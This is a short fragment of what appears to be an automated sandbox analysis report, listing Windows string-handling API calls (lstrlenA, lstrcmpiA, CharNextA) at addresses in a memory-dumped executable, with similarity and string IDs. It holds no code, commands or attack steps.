                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
                                                          • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0